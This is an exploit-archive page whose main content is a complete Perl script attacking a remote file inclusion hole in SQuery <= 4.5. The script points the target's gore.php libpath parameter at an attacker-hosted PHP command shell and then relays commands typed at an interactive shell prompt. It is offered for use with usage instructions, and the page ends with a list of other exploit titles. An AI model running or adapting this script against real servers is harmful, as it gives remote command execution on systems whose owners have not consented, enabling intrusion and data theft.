exploits , vulnerabilities , articles , SQuery <= 4.5(libpath) Remote File Inclusion Exploit-in perl

2006-07-10 SQuery <= 4.5 (gore.php) Remote File Inclusion Vulnerability
2006-04-02 SQuery <= 4.5 (libpath) Remote File Inclusion Exploit

2006-07-15

SQuery <= 4.5(libpath) Remote File Inclusion Exploit-in perl

Rated as : Moderated Risk
SQuery <= 4.5(libpath) Remote File Inclusion Exploit-in perl
------------------
#!/usr/bin/perl
##
# SQuery <= 4.5(libpath) Remote File Inclusion Exploit
# hadihadi_zedehal_2006&a.nosrati
#
# virangar security team
#
#
##
# www.virangar.net&www.virangar.org
#
##
# usage:
# perl vir.pl <target> <cmd shell location> <cmd shell
variable>
#
# perl vir.pl http://target.com/SQuery/lib/ http://yorshell.com/cmd.php
cmd
#
##
# #
#greetz:hadi_aryaie2004&ahmad_virangar2004&mahtab_e66&all virangar
members
#
# Contact:  info@virangar.net hadihadi_zedehal_2006@yahoo.com
##
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
      print "[shell] \$";
while(<STDIN>)
      {
              $cmd=$_;
              chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET
=>$Path.'gore.php?libpath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die
"\nCould Not connect\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;
if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return
="";}
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return
=~/: Cannot execute a blank command in <b>/)
      {print "\nCould Not Connect to cmd Host or Invalid Command
Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print
"\nInvalid Command or No Return\n\n"}
if($return =~ /(.*)/)
{
      $finreturn = $1;
      $finreturn=~ tr/[ê]/[\n]/;
      print "\r\n$finreturn\n\r";
      last;
}
else {print "[shell] \$";}}}last;
sub head()
 {
 print
"\n============================================================================\r\n";
 print " *SQuery <= 4.5(libpath) Remote File Inclusion
Exploit*\r\n";
 print
"============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl vir.pl <target> <cmd shell location>
<cmd shell variable>\r\n\n";
 print " <Site> - Full path  ex:
http://www.site.com/SQuery/lib/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g
http://www.yourshell.com/cmd.php \r\n";
 print " <cmd variable> - Command variable used in php shell
\r\n";
 print
"============================================================================\r\n";
 print "                   coded by hadihadi_zedehal_2006&a.nosrati
\r\n";
 print "                    www.virangar.net*www.virangar.org
\r\n";
 print
"============================================================================\r\n";
 exit();
 }

securitydot.net - 2006-07-15

Exploits - newest 10 RSS | More

2007-06-15 56645 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33754 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41894 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28969 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19495 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16476 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19137 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16340 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33256 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17000 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit